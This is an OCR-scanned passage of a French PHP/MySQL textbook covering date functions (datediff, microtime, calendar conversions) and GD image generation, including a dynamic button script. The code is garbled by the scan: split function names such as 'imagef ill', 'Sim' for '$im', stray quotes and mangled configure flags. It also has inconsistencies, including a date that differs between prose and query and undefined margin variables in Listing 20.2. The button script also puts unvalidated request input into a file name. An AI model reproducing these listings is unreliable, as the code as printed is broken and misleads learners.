tionnent en dehors de l'intervalle fiable des dates Unix. Vous devez vous connecter a un 
serveur MySQL pour executer une requete MySQL, mais vous n'avez pas besoin 
d'utiliser les donnees de la base de donnees. 

La requete suivante ajoute un jour a la date du 23 fevrier 1700 et renvoie la date 
resultante : 

select adddate( 1 1700-02-28' , interval 1 day) 
L'annee 1700 n'etant pas bissextile, le resultat est 1 700 03 01 . 

Le manuel MySQL decrit de maniere exhaustive la syntaxe pour decrire et modifier des 
dates. Vous trouverez ces instructions sur la page http://www.mysql.com/doc/en/ 
Date_and_time_functions.html. 

Malheureusement, il n'existe pas de moyen simple d'obtenir le nombre d'annees entre 
deux dates, aussi l'exemple de l'anniversaire reste-t-il quelque peu farfelu. Vous pouvez 
cependant aisement obtenir l'age d'une personne en jours, puis utiliser le code du 
Listing 19.2, qui convertit approximativement cet age en annees. 

Listing 19.2 : mysql_calc_age.php — Utiliser MySQL pour determiner l'age d'une personne 
d'apres sa date de naissance 



<?php 

// Definition de la date sur laquelle sera fonde le calcul 
$jour = 18; 
$mois = 9; 
$annee = 1972; 

// Formatage de cette date en ISO 8601 

$naissance_IS0 = date("c", mktime (0, 0, 0, $mois, $jour, $annee)); 
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II Utilisation d'une requete MYSQL pour calculer l'age en jours. 
$db = mysqli_connect( ' localhost 1 , ' utilisateur 1 , 'secret'); 
$res = mysqli_query ($db, "select datedif f ( now( ) , ' $naissance_ISO ' ) " ) ; 
$age = mysqli_f etch_array ($res) ; 

// Conversion de l'age en annee (approximativement) . 
echo "Vous avez " . floor($age[0] /365.25) . " ans."; 
?> 



Apres avoir converti la date de naissance au format ISO, on passe la requete suivante a 
MySQL : 

select datediff (now( ) , ' 1972-09-18T00:00:00+10:00' ) 

La fonction MySQL now() renvoie toujours la date et l'heure courantes, tandis que 
datediff ( ) soustrait une date a une autre et renvoie la difference en jours. 

Vous remarquerez que Ton ne selectionne aucune donnee dans une table et qu'on ne 
choisit meme pas de base de donnees. En revanche, il faut se connecter au serveur 
MySQL avec un nom d'utilisateur et un mot de passe valides. 

Comme il n'existe aucune fonction integree specifique pour ce type de calcul, une 
requete SQL permettant de calculer le nombre exact d'annees serait assez complexe. 
Ici, nous avons effectue un compromis en divisant l'age en jours par 365,25 afin d'obte- 
nir l'age en annees. Ce calcul peut done se tromper d'un an selon le nombre d'annees 
bissextiles qui se sont ecoulees depuis la naissance de la personne. 

Utiliser des microsecondes 

Pour certaines applications, la mesure du temps en secondes n'est pas assez precise. Si 
vous souhaitez mesurer des periodes tres courtes, comme le temps requis pour executer 
certains scripts PHP, vous devez utiliser la fonction microtime( ). 

Avec PHP 5, vous devez appeler microtime( ) en lui passant true en parametre 
get as float positionne a true. Avec ce parametre facultatif, l'appel renvoie une 
etiquette temporeile sous la forme d'un nombre a virgule flottante pouvant etre utilise 
pour toutes sortes de calculs. Cette etiquette est la meme que celle renvoyee par 
mktime ( ) , time ( ) ou date ( ) , a ceci pres qu'elle inclut une partie fractionnaire. 

L' instruction : 

echo number_f ormat (microtime(true) , 10, '.', ''); 
produit un resultat comme 1 1 74091 854 . 84. 

Sur les versions plus anciennes, il n'est pas possible de demander un resultat au format 
float. Le resultat produit est une chaine. L'appel a microtime( ) sans parametre renvoie 
une chaine de la forme "0 . 34380900 1 1 74091 81 6". Le premier nombre correspond a la 
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portion fractionnaire et le second, au nombre de secondes completes ecoulees depuis le 
l er janvier 1970. 

Comme il est plus pratique de gerer des nombres que des chaines, il est plus simple 
d'appeler microtime ( ) avec le parametre true si vous utilisez PHP 5. 

Utilisation des fonctions PHP de calendrier 

PHP offre tout un ensemble de fonctions permettant d'effectuer des conversions entre 
differents systemes de calendriers. Les calendriers les plus usites sont les calendriers 
gregorien, julien, ainsi que le nombre de jours julien. 

Le calendrier gregorien est celui qui est utilise par la plupart des pays occidentaux. La 
date gregorienne du 15 octobre 1582 est equivalente a la date du 5 octobre 1582 du 
calendrier julien. Avant cette date, c'etait plutot le calendrier julien qui etait en usage. 
Ces pays ont adopte le calendrier gregorien a des moments differents et certains n'ont 
adopte ce calendrier qu'au xx e siecle. 

Si vous avez probablement entendu parler de ces deux systemes de calendriers, le 
nombre de jours julien JD pour Julian Day) vous est peut-etre inconnu. Ce systeme de 
calendrier est semblable au systeme des dates Unix. II consiste a compter le nombre de 
jours ecoules depuis une date situee approximativement 4 000 ans avant J.-C. En lui- 
meme, ce calendrier n'est pas tres utile, mais il est bien pratique pour passer d'un 
format de date a 1' autre. En effet, pour convertir une date exprimee dans un calendrier 
donne en son equivalent dans un autre calendrier, nous pouvons passer par une conversion 
intermediaire en nombre de jours julien. 

Pour beneficier des fonctions PHP de calendrier sous Unix, il faut avoir compile 
l'extension de calendrier de PHP avec enable calendar. Ces fonctions sont integrees 
dans l'installation standard sous Windows. 

Pour vous donner une idee des fonctions de calendrier offertes par PHP, voici les proto- 
types des fonctions qui permettent de passer du calendrier gregorien au calendrier 
julien : 

int gregoriantojd (int mois, int jour, int annee) 
string j dtoj ulian ( int jour_julien) 

Pour convertir une date, il faut appeler ces deux fonctions : 

$jd = gregoriantojd (9, 18, 1582); 
echo jdtojulian($jd) ; 

Ce code affiche la date du calendrier julien au format MM/JJ/AAAA. 

PHP offre diverses variantes de ces fonctions pour convertir des dates entre les calendriers 
gregorien, julien, francais et juif, ainsi que les dates Unix. 
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Pour aller plus loin 

Pour en savoir plus sur les fonctions de date et d'heure de PHP et de MySQL, consultez 
les manuels en ligne http://no.php.net/manual/fr/ref.datetime.php et http:// 
dev.mysql.com/doc/refman/5.0/en/date-and-time-functions.html. 

Vous trouverez egalement des informations precieuses concernant les conversions entre 
calendriers dans le manuel PHP en ligne, sur la page http://php.net/manual/en/ 
ref.calendar.php. 

Pour la suite 

PHP a la particularite extremement appreciable de permettre la creation d'images "au 
vol". Le Chapitre 20 explique comment utiliser la bibliotheque des fonctions de mani- 
pulation d'images pour produire des effets etonnants et pratiques. 



20 



Generation damages via PHP 



Permettre la creation d'images "a la volee" est l'une des particularites tres utiles de 
PHP, qui integre des fonctions de creation et de manipulation des images. Vous pouvez 
egalement utiliser la bibliotheque de fonctions specialisees GD2 pour creer de nouvel- 
les images ou manipuler des images existantes. Ce chapitre explique comment tirer 
parti des fonctions PHP de generation d'images pour obtenir des resultats interessants 
et utiles. 

Nous illustrerons nos propos par deux exemples : un script de creation de boutons a la 
volee pour un site web, ainsi qu'un script de generation d'un histogramme a partir de 
donnees numeriques enregistrees dans une base de donnees MySQL. 

Nous utiliserons la bibliotheque GD2, mais il existe egalement une autre bibliotheque 
PHP tres utilisee pour le traitement des images : ImageMagick ne fait pas partie de la 
version standard de PHP, mais elle peut aisement etre installee a partir de la PECL 
(PHP Extension Class Library). Les bibliotheques ImageMagick et GD2 possedent un 
grand nombre de fonctionnalites similaires, mais ImageMagick est mieux fournie dans 
certains domaines. Si vous souhaitez creer des images GIF (et meme des GIF animees), 
notamment, tournez-vous plutot vers ImageMagick. Si vous souhaitez travailler avec 
des images en couleurs reelles ou reproduire des effets de transparence, comparez les 
caracteristiques des deux bibliotheques. 

Pour ImageMagick, utilisez PECL avec l'adresse http://pecl.php.net/package/ 
imagick. 

Le site principal d'ImageMagick propose des demonstrations de ses capacites et une 
documentation detaillee a l'adresse http://www.imagemagick.org. 
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Configuration du support des images dans PHP 

Bien que certaines fonctions de manipulation des images dans PHP soient toujours 
disponibles, la plupart requierent la bibliotheque GD2. Des informations detaillees sur 
GD2 peuvent etre telechargees a l'adresse http://www.libgd.org/Main_Page. 

Depuis la version 4.3, PHP est fourni avec sa propre version de la bibliotheque GD2, 
qui est prise en charge par l'equipe de PHP. Cette version est plus simple a installer avec 
PHP et est habituellement plus a jour ; c'est pourquoi il est preferable de l'utiliser. Avec 
Windows, les formats PNG et JPEG sont automatiquement pris en charge du moment 
que vous avez enregistre l'extension php_gd2.dll. Pour ce faire, copiez le fichier 
php_gd2.dll du repertoire d'installation de PHP (il se trouve dans le sous-repertoire 
\ext) dans votre repertoire systeme (C:\Windows\system avec Windows XP). Vous devez 
egalement decommenter la ligne suivante dans php.ini, en otant le point-virgule au 
debut de la ligne : 

extension=php_gd2.dll 

Si vous avez un systeme Unix et que vous vouliez travailler avec le format PNG, il vous 
faut installer les bibliotheques libpng et zlib, que vous trouverez (respectivement) aux 
URL http://www.libpng.org/pub/png/ et http://www.gzip.org/zlib/. 

II faudra ensuite configurer PHP avec les options suivantes : 

- -with- png-dir= / chemin I acces I libpng 
- -wit h- zlib- tiir= I chemin I acces I zlib 

Si vous avez un systeme Unix et que vous souhaitiez travailler avec le format JPEG, 
vous devez telecharger jpeg 6b et recompiler la bibliotheque GD en y incluant le 
support JPEG. Vous pouvez le telecharger sur le site ftp://ftp.uu.net/graphics/jpeg/. 

Vous devrez ensuite reconfigurer PHP avec 1' option : 

-- wit h- j peg -dir=/ chemin /acces /jpeg -6b 
puis recompiler PHP. 

Pour pouvoir utiliser des polices TrueType dans vos images, vous aurez egalement 
besoin de la bibliotheque FreeType, qui est fournie avec PHP. Vous pouvez egalement 
la telecharger separement a partir de l'URL http://www.freetype.org/. 

Pour beneficier de polices PostScript Type 1, c'est la bibliotheque t1 lib qui doit etre 
telechargee et installee. Celle-ci est disponible a l'URL ftp://sunsite.unc.edu/pub/ 
Linux/libs/graphics/. 

Pour 1' installer, executez le programme de configuration de PHP avec 1' option : 

--with-t1 lib [-chemin/ acces /tilib] 
Enfm, vous devrez evidemment configurer PHP en utilisant with gd. 
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Formats graphiques 

La bibliotheque GD prend en charge les formats graphiques JPEG, PNG, WBMP et 
GIF. Nous allons a present examiner brievement les caracteristiques de ces differents 
formats. 

JPEG 

JPEG (Joint Photographic Experts Group) est, en realite, un ensemble de normes, pas 
un format specifique. Le veritable format de fichier qui se cache derriere le sigle JPEG 
est officiellement appele JFIF, qui correspond a l'un des standards dermis par le groupe 
JPEG. 

Si vous ne connaissez pas le format JPEG, sachez seulement qu'il est generalement 
employe pour enregistrer des photographies ou des images riches en couleurs ou en 
degrades de couleurs. Ce format met en oeuvre une compression avec perte. En effet, 
une certaine qualite de 1' image est sacrifice pour obtenir une reduction importante de la 
taille du fichier. Ce format etant surtout utilise avec des images analogiques presentant 
des degrades de couleurs, la perte de qualite obtenue n'est normalement pas detectee 
par l'oeil humain. En revanche, il ne convient pas aux traces de lignes, au texte ni aux 
surfaces de couleur unie. 

Pour plus d' informations sur le format JPEG/JFIF, consultez le site officiel du JPEG, 
http://www.jpeg.org/. 

PNG 

Le format graphique PNG (Portable Network Graphics) est en passe de remplacer le 
format GIF (Graphics Interchange Format) pour des raisons que nous evoquerons un 
peu plus loin. PNG met en oeuvre une compression sans perte. Cette caracteristique en 
fait done un format bien adapte aux images contenant du texte, des traces et des surfa- 
ces de couleur unie, comme les bannieres ou les boutons des sites web. C'est a ce type 
d'images qu'etait normalement reserve le format GIF. Les versions compressees en 
PNG d'une image sont generalement de taille semblable aux versions GIF. 

Le format PNG offre egalement une transparence variable, la correction gamma et 
l'entrelacement a deux dimensions. Toutefois, il ne permet pas de creer des anima- 
tions ; pour ce faire, vous disposerez bientat de l'extension MNG de ce format, qui est 
encore en developpement. 

Les systemes de compression sans perte sont utiles pour les illustrations, mais ils sont 
generalement peu efficaces pour stacker des photos de grande taille, car ils ont tendance 
a produire des fichiers volumineux. 
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Pour en savoir plus sur ce format, visitez le site officiel dedie a PNG, http:// 
www.libpng.org/pub/png/. 

WBMP 

WBMP (Wireless Bitmap) est un format de fichier specialement concu pour les periphe- 
riques sans fil. II n'est pas encore tres utilise. 

GIF 

Le format GIF (Graphics Interchange Format) utilise une compression sans perte. Son 
usage est tres largement repandu sur le Web pour les images contenant du texte, les 
traces et les surfaces de couleur unie. 

Ce format utilise une palette limitee a 256 couleurs distinctes appartenant a un espace 
de couleurs RGB sur 24 bits. II permet egalement de creer des animations ou chaque 
image peut utiliser sa propre palette de 256 couleurs. Cette limitation des couleurs rend 
ce format inadapte a la reproduction des photographies en couleur et aux images conte- 
nant des degrades de couleur. En revanche, il convient tres bien aux images simples 
comme les graphiques ou les logos contenant des aplats colores. 

Les images GIF sont compressees a l'aide de l'algorithme de compression sans perte 
LZW, qui permet de reduire la taille du fichier sans degrader sa qualite visuelle. 

Creation d'images 

Les quatre etapes fondamentales de la creation d'une image avec PHP sont les suivantes : 

1. Creation d'un canevas d'image sur lequel travailler. 

2. Dessin de formes ou impression de texte sur ce canevas. 

3. Generation de 1' image finale. 

4. Nettoyage des ressources. 

Nous allons commencer notre etude par un script simple de creation d'image, presente 
dans le Listing 20.1. 

Listing 20.1 : graphe_simple.php — Creation d'une image simple contenant une ligne 
et le mot Ventes 



<?php 

// Definition du canevas 
$hauteur = 200; 
$largeur = 200; 

Sim = imagecreatetruecolor($largeur, $hauteur); 
$blanc = imagecolorallocate ($im, 255, 255, 255); 
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$bleu = imagecolorallocate ($im, 0, 0, 64); 

// Dessin sur 1' image 
imagef ill($im, 0, 0, $bleu); 

imageline($im, 0, 0, $largeur, $hauteur, $blanc); 
imagestring($im, 4, 50, 150, 'Ventes', $blanc); 

// Production de 1 1 image 
Header ('Content-type: image/png'); 
imagepng($im) ; 

// Nettoyage des ressources 
imagedestroy ($im) ; 

?> 



Le resultat de l'execution de ce script est montre a la Figure 20.1. 

Figure 20. 1 

Le script du Listing 20. 1 
definit un arriere-plan 
bleu, trace une ligne et 
ajoute un texte. 



Nous allons examiner en detail chacune des etapes de la creation de cette image. 
Canevas de I'image 

Pour commencer l'elaboration ou la modification d'une image dans un script PHP, il est 
necessaire de creer au prealable un identificateur d'image. Pour cela, deux possibility's 
sont envisageables. La premiere consiste a creer un canevas vide, au moyen de la fonction 
imagecreatetruecolor ( ), comme dans le script du Listing 20.1 : 

$im = imagecreatetruecolor($largeur, $hauteur) ; 

Cette fonction prend deux parametres : la largeur de la nouvelle image et sa hauteur. 
Elle renvoie un identificateur pour la nouvelle image (un identificateur d'image fonc- 
tionne pour l'essentiel comme un descripteur de fichier). 

La seconde possibilite consiste a lire dans un fichier graphique existant, pour 
ensuite effectuer des operations telles qu'un filtrage, un redimensionnement ou des 
ajouts. Pour cela, vous pouvez utiliser l'une des fonctions imagecreatef romPNG( ), 
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imagecreatef romJPEG( ) ou imagecreatef romGIF( ), selon le format de l'image a lire. 
Chacune de ces fonctions prend le nom du fichier a lire en parametre, par exemple : 

$im = imagecreatef romPNG( 'image. png' ) ; 

Nous verrons plus loin un exemple de mise en ceuvre de ces fonctions lorsque nous 
utiliserons des images existantes pour creer des boutons a la volee. 

Dessin ou impression de texte dans une image 

Le dessin ou l'impression de texte dans une image implique deux etapes. Tout d'abord, 
vous devez selectionner les couleurs avec lesquelles vous voulez dessiner. Comme vous 
le savez probablement deja, les couleurs affichees sur l'ecran d'un ordinateur sont 
constitutes de quantites bien defmies de rouge, de vert et de bleu. Les formats graphi- 
ques utilisent une palette des couleurs constitute par un sous-ensemble specifique de 
toutes les combinaisons possibles de ces trois couleurs. Pour employer une couleur 
particuliere dans une image, il faut ajouter cette couleur a la palette de l'image. Cela est 
vrai pour toutes les couleurs que vous souhaitez utiliser, meme pour le blanc et le noir. 

Pour selectionner les couleurs d'une image, il faut appeler la fonction imagecoloral 
locate(), qui prend comme parametres l'identificateur de l'image a traiter, puis les 
valeurs de rouge (R), de vert (V) et de bleu (B) de la couleur voulue. 

Dans le Listing 20. 1 , nous utilisons deux couleurs : le bleu et le blanc. Les appels 
correspondants de la fonction imagecolorallocate( ) sont done formules de la 
maniere suivante : 

$blanc = imagecolorallocate ($im, 255, 255, 255); 
$bleu = imagecolorallocate ($im, 0, 0, 64); 

La fonction imagecolorallocate ( ) renvoie un identificateur de couleur qui permet 
ensuite d'acceder a la couleur. 

Pour la deuxieme etape de dessin d'une image, differentes fonctions sont utilisables 
selon le motif a dessiner (des lignes, des arcs, des polygones ou du texte). 

Les fonctions de dessin offertes par PHP requierent generalement les parametres 
suivants : 

■ l'identificateur de l'image ; 

■ le debut, et parfois la fin, des coordonnees du motif a dessiner ; 

■ la couleur avec laquelle dessiner ; 

■ pour du texte, des informations sur les polices de caracteres. 

L' exemple du Listing 20. 1 fait appel a trois des fonctions PHP de dessin que nous 
examinerons tour a tour. 
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Tout d'abord, le code peint un fond bleu, au moyen de la fonction imagef ill( ) : 

imagef ill($im, 0, 0, $bleu); 

La fonction ImageFill() prend respectivement comme parametres l'identincateur de 
l'image, les coordonnees de depart de la zone a peindre (x et y), ainsi que la couleur 
de remplissage. 

— Info 

Les coordonnees de l'image sont indiquees par rapport au coin superieur gauche, defini par 
x=0, y=0. Le coin inferieur droit de l'image est defini par les coordonnees x=$largeur, 
y=$hauteur. Les conventions utilisees ici sont done I'inverse des conventions graphiques 
habituelles ! 



Le code trace ensuite un trait qui part du coin superieur gauche (0,0) jusqu'au coin 
inferieur droit de l'image ($largeur, $hauteur) : 

imageline($im, 0, 0, $largeur, $hauteur, $blanc); 

La fonction imageline( ) prend comme parametres l'identincateur de l'image, le point 
de depart (x et y) du trait, le point final, puis la couleur. 

Pour finir, le code ajoute une legende au graphe : 

imagestring ($im, 4, 50, 150, 'Ventes', $blanc) ; 

La fonction imagestring ( ) prend des parametres legerement differents de ceux des 
fonctions precedentes. Son prototype est le suivant : 

int imagestring (resource im, int police, int x, int y, string s, int col) 

Ses parametres sont l'identincateur de l'image, la police, les coordonnees x et y du 
point initial d'ecriture du texte, le texte a ecrire et la couleur. 

La police est indiquee par un chiffre compris entre 1 et 5, qui designe une des polices 
predefinies de PHP encodees en Latin-2 (ces nombres correspondent a la taille de la 
police). Vous pouvez egalement utiliser des polices TrueType ou PostScript Type 1. A 
chaque jeu de polices est associe un jeu de fonctions PHP correspondant. Dans le 
prochain exemple, nous utiliserons des fonctions PHP pour le type TrueType. 

L'emploi de ces jeux alternatifs de fonctions peut toutefois se justifier par le fait que la 
fonction imagestring ( ) et les fonctions associees comme imagechar( ) produisent un 
texte aliase (crenele), tandis que les fonctions PHP pour les types TrueType et PostScript 
produisent un texte anti-aliase (lisse). 

La Figure 20.2 montre la difference entre un texte avec et sans anti-aliasing (lissage). 
Le texte non lisse presente des effets de cretes dans les lettres, contrairement au texte 
lisse. Lorsqu'une image est soumise a un lissage, les pixels de couleurs entre le fond et 
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le texte sont utilises pour lisser l'apparence du texte et faire disparaitre l'effet de 
"marches d'escalier". 

Normal 

Anti-aliased 

Figure 20.2 

Le texte normal apparait crenele, notamment avec les caracteres de grande taille. 
L'anti-aliasing (lissage) permet d'adoucir les courbes et les coins des lettres. 

Production de I'image finale 

Une image peut etre generee pour etre directement affichee dans un navigateur web ou 
pour etre enregistree dans un fichier. 

Dans l'exemple du Listing 20.1, nous avons dirige la sortie vers le navigateur. Le 
processus de generation se deroule en deux etapes. Tout d'abord, le navigateur web doit 
etre informe que c'est une image qui lui est transmise, pas du texte ou du code HTML. 
C'est pour cette raison que nous faisons appel a la fonction Header ( ) pour indiquer le 
type MIME de I'image : 

Header( 'Content-type: image/png' ) ; 

Normalement, le type MIME est la premiere information envoyee par le serveur web au 
navigateur lorsque ce dernier demande un fichier. Dans le cas d'une page HTML ou 
PHP (apres execution), la premiere information envoyee est la suivante : 

Content-type: text/html 

Cet en-tete informe le navigateur de la maniere dont les donnees qui suivent doivent 
etre traitees. 

Nous avons ici utilise la fonction Header ( ) pour transmettre une chaine d'en-tete HTTP 
sous forme brute, mais elle est egalement souvent utilisee pour realiser des redirections 
HTTP, qui demande au navigateur de charger une autre page que celle qu'il a deman- 
ded. On emploie generalement ce mecanisme lorsque des pages web sont deplacees, par 
exemple : 

Header ('Location: http://www.domaine.com/nouvelle_page_accueil.html '); 

Concernant Header ( ), il est important de noter que cette fonction ne peut pas etre 
executee si Ton a deja envoye du contenu pour la page concernee. PHP envoyant 
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automatiquement un en-tete HTTP lorsqu'une page est envoyee au navigateur, une 
instruction echo, voire une balise PHP d'ouverture precedee d'une espace, provoquera 
l'envoi des en-tetes et PHP produira un message d'avertissement a l'appel de la fonc- 
tion Header ( ). Vous pouvez envoyer plusieurs en-tetes HTTP avec plusieurs appels de 
la fonction Header () dans le meme script, mais ils doivent tous apparaitre avant 
d' envoyer quoi que ce soit d' autre au navigateur web. 

Lorsque les donnees d' en-tete ont ete envoyees, celles de 1' image peuvent etre transmises 
au navigateur via un appel a la fonction imagepng ( ) : 

imagepng($im) ; 

Cette ligne envoie les donnees vers le navigateur au format PNG. Un autre format 
graphique aurait egalement pu etre utilise, en appelant la fonction image] peg () (si le 
support JPEG est active). Dans ce cas, toutefois, il faut d'abord transmettre l'en-tete 
correspondant, c'est-a-dire : 

Header( 'Content-type: image/jpeg 1 ) ; 

La deuxieme possibilite pour generer l'image finale consiste a l'ecrire dans un fichier 
au lieu de l'envoyer directement au navigateur. Pour cela, il suffit d'indiquer le nom du 
fichier comme second parametre de la fonction imagepng () (ou d'une fonction simi- 
laire correspondant a un autre format graphique) : 

Imagepng($im, $nomfic); 

Dans ce cas, toutes les regies habituelles relatives a l'ecriture dans des fichiers via PHP 
s'appliquent (notamment, il faut que leurs permissions soient correctement definies). 

Nettoyage final 

Une fois que vous en avez termine avec une image, il est necessaire de restituer au 
serveur les ressources utilisees en supprimant l'identificateur de l'image. Ce nettoyage 
est realise par un appel a imagedestroy ( ) : 

imagedestroy ($im) ; 

Utilisation d'images produites automatiquement dans 
d'autres pages 

Un en-tete ne pouvant etre envoy e qu'une seule fois et etant notre seul moyen pour 
informer le navigateur que des donnees graphiques lui sont transmises, il est assez deli- 
cat d'incorporer dans une page normale des images creees a la volee. Pour cela, trois 
approches sont envisageables : 

■ Une page entiere peut etre consacree a l'affichage de l'image, comme on l'a fait 
dans l'exemple precedent. 
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■ L'image peut etre ecrite dans un fichier, comme nous l'avons deja mentionne. Une 
balise <img> normale permet ensuite d'y faire reference. 

I Nous pouvons placer le script de generation de l'image dans une balise <img>. 

Nous avons deja traite les deux premieres approches. Penchons-nous a present d'un peu 
plus pres sur la troisieme. Dans celle-ci, l'image est incluse en ligne dans du code 
HTML, avec une balise de la forme : 

<img src="graphe_simple . php" height="200" width="200" 
alt="Les ventes baissent" /> 

Au lieu de placer directement une image PNG, JPEG ou GIF dans cette balise, on place 
dans l'attribut src le nom du script PHP qui produit l'image. La Figure 20.3 montre un 
exemple d' application de cette methode. 

Figure 20.3 

Pour I'utilisateur final, 
l'image produite dyna- 
miquement en ligne 
apparait comme une 
image habituelle. 



C\ C\ r\ graphe_simple.php (Image PNG, 200... CD 





Utilisation de texte et de polices pour creer des images 

L exemple que nous allons a present etudier est un peu plus complexe que le precedent. 
Pour un developpeur de site web, il est tres utile de pouvoir automatiquement creer des 
boutons ou toute autre image. Avec les techniques proposees plus haut, vous pouvez 
facilement elaborer des boutons simples sous la forme de rectangles de couleur unie. 
Vous pouvez aussi produire des effets plus compliques par programme, mais c'est gene- 
ralement plus simple avec un logiciel de dessin. II est alors aussi plus simple de distinguer 
le travail de 1' artiste et celui du programmeur. 

Dans cet exemple, les boutons sont generes a partir d'un modele de bouton vide, afm de 
produire des effets comme un biseautage. Notez que ce type d'effet s'obtient beaucoup 
plus facilement avec des outils graphiques comme Photoshop ou GIMP. Nous allons 
utiliser la bibliotheque de manipulation des images de PHP pour partir d'une image de 
base que nous modifierons et que nous enrichirons ensuite. 
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Par ailleurs, nous utiliserons des polices TrueType pour afficher du texte "lisse" (c'est- 
a-dire soumis a un anti-aliasing). Les fonctions de manipulation des polices TrueType 
ont leurs propres particularites, que nous decrirons. 

Le processus de base consiste a definir un texte et a creer un bouton portant ce texte en 
intitule. Le texte est centre a la fois horizontalement et verticalement sur le bouton et 
sera afnche avec la plus grande taille de police possible compte tenu des dimensions du 
bouton. 

Compte tenu de sa simplicite, le code HTML du formulaire pour tester et experimenter 
le generateur de bouton n'est pas donne dans cet ouvrage. Vous le trouverez sur le site 
Pearson, dans le fichier creation_bouton.html. Cette interface est montree a la 
Figure 20.4. 



Creation de boutons 

Creation de boutons 

Tapcz lc tcxte du bouton 



Choisisscz la coulcur du bouton : 
S Rouge 
Overt 
8 Bleu 

( Creer le boutorO 

Terrnine A 



Ce type d'interface vers un programme pourrait etre utilise pour generer automatique- 
ment des sites web. Le script correspondant pourrait egalement etre invoque en ligne, 
afm de produire tous les boutons d'un site a la volee, mais il faudrait une mise en cache 
pour empecher que 1' operation ne devienne trop longue. 

La Figure 20.5 montre un resultat typique de l'execution de ce script. 
Figure 20.5 

Un bouton produit par le 
script creer_bouton.php. 



tigure zu.t 

Ce formulaire permet a 
I'utilisateur de choisir la 
couleur du bouton et de 
saisir le texte de I'intitule 
du bouton. 



^ make_button.php (PNG Image, 150x67 pixels) - Mozilla Firefox 



Baa 



File Edit ^ew Histury Bookmarks Tools Help 



h"&:.'.' 0-Z3 hosL'p ,, pmy5qKB''chap:er22/ma*-;a_bat',an php 
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Le bouton est produit par le script creer_bouton.php du Listing 20.2. 

Listing 20.2 : creer_bouton.php — Ce script peut etre appele depuis le formulaire 
de conception_bouton.html ou depuis une balise HTML IMG 



<?php 

// Verifie que l'on a les donnees appropriees. 

// Les variables sont le texte du bouton et sa couleur. 

$texte_bouton = $_REQUEST[ 1 texte_bouton 1 ] ; 
$couleur = $_REQUEST[ 'couleur' ] ; 

if (empty ($texte_bouton) || empty ($couleur) ) { 
echo "Impossible de creer 1' image - le formulaire est incomplet."; 
exit; 

} 

// Creation d'une image avec le fond voulu et verification de sa taille. 
$im = imagecreatef rompng( " bouton-$couleur . png " ) ; 

$largeur_image = imagesx($im) ; 
$hauteur_image = imagesy ($im) ; 

// Nos images ont besoin d'une marge de 18 pixels a l'interieur des bords 
// de 1' image. 

$largeur_image_sans_marge = $largeur_image - (2 * 18); 
$hauteur_image_sans_marge = $hauteur_image - (2 * 18); 

// Teste si la taille de la police convient et diminue celle-ci jusqu'a 

// ce qu'elle convienne. On part de la plus grande taille pouvant tenir 
// dans nos boutons. 
$taille_police = 33; 

// Indique 1 ' emplacement des polices a GD2 
putenv( ' GDFONTPATH=C : \WINDOWS\Fonts ' ) ; 
$nom_police = 'arial'; 

do { 

$taille_police-- ; 

// Determine la taille du texte avec cette taille de police. 
$bbox=imagettf bbox ($taille_police, 0, $nom_police, $texte_bouton) ; 

$texte_droite = $bbox[2]; // coordonnee droite 
$texte_gauche = $bbox[0]; // coordonnee gauche 
$largeur_texte = $texte_droite - $texte_gauche; // largeur ? 
$hauteur_texte = abs($bbox[7] - $bbox[1]); // hauteur ? 

} while ( $taille_police >8 && 

($hauteur_texte > $hauteur_texte_sans_marge | | 

$largeur_texte > $largeur_texte_sans_marge) 

); 
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if ( $hauteur_texte > $hauteur_texte_sans_marge | 
$largeur_texte > $largeur_texte_sans_marge ) { 
// Aucune taille de police ne tiendra dans le bouton 
echo 'Le texte indique ne tient pas dans le bouton. <br />'; 

} else { 

// On a trouve une taille de police qui convient ; 
// On cherche ou placer le texte. 

$texte_x = $largeur_image/2.0 - $largeur_texte/2.0; 
$texte_y = $hauteur_image/2.0 - $hauteur_texte/2 . ; 

if ($texte_gauche < 0) { 

$texte_x += abs($texte_gauche) ; // ajout d'un debordement gauche. 

} 

$ligne_texte_dessus = abs($bbox[7] ) ; // distance au-dessus de la base ? 

$texte_y += $ligne_texte_dessus; // ajout d'un facteur de hauteur. 

$texte_y -= 2; // ajustement pour la forme de notre modele. 

$blanc = imagecolorallocate ($im, 255, 255, 255); 

imagettftext($im, $taille_police , 0, $texte_x, $texte_y, $blanc, 
$nom_police, $texte_bouton) ; 

Header ('Content-type: image/png ' ) ; 
imagepng ($im) ; 

} 

imagedestroy ($im) ; 
?> 



Le script du Listing 20.2 est l'un des plus longs que nous ayons etudies jusqu'ici. Nous 
allons l'examiner section par section. Le code commence par les tests classiques de 
verification d'erreur, puis definit le canevas sur lequel l'image sera ensuite elaboree. 

Definition du canevas de base 

Le script du Listing 20.2 part d'une image existant au lieu d'en creer une nouvelle. Le 
bouton de base est propose dans trois couleurs : rouge (bouton-rouge.png), vert 
(bouton-vert.png) et bleu (bouton-bleu.png). 

La couleur choisie par l'utilisateur est enregistree dans la variable $couleur du formu- 
laire HTML. 

Pour commencer, la couleur est extraite de la variable superglobale $ REQUEST et un 
nouvel identificateur d'image est defini pour le bouton approprie : 

$couleur = $_REQUEST[ 'couleur' ] ; 

$im = imagecreatef rompng ( "bouton-$couleur.png" ) ; 
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La fonction imagecreatef rompng ( ) prend en parametre le nom de fichier d'une image 
PNG et renvoie un identificateur correspondant a la copie de ce PNG. Notez que cette 
fonction n'affecte en rien l'image originale qui lui est passee comme parametre. Les 
fonctions imagecreatef romj peg ( ) et imagecreatef romgif ( ) s'utilisent de la meme 
maniere, a condition que le support approprie ait ete installe. 

— Info 

L'appel de la fonction imagecreatef rompng ( ) ne fait que creer l'image en memoire. Pour 
enregistrer l'image dans un fichier ou pour I'afficher dans le navigateur, vous devez 
employer la fonction imagepng( ), sur laquelle nous allons revenir un peu plus loin. Auparavant, 
toutefois, l'image requiert quelques preparatifs. 



"Faire tenir" le texte sur le bouton 

Le texte saisi par l'utilisateur dans le formulaire HTML est enregistre dans la variable 
$texte bouton. Nous voulons que le texte du bouton soit affiche dans la plus grande 
taille de police possible, tout en restant entierement cadre a l'interieur du bouton. Cette 
operation est realisee a l'aide d'une iteration ou, plus exactement, par essais successifs. 

Nous commencons par definir les variables appropriees. Les deux premieres sont la 
hauteur et la largeur de l'image du bouton : 

$largeur_image = imagesx(Sim) ; 
$hauteur_image = imagesy ($im) ; 

Les deux autres variables precisent la marge a partir du bord du bouton. L'objectif etant 
ici de produire des boutons biseautes, il faut laisser un espace libre autour du texte affi- 
che sur le bouton. Si vous utilisez d' autres images, la largeur de cette marge sera bien 
sur differente. Ici, la valeur choisie est de 1 8 pixels : 

$largeur_image_sans_marge = $largeur_image - (2 * 18); 
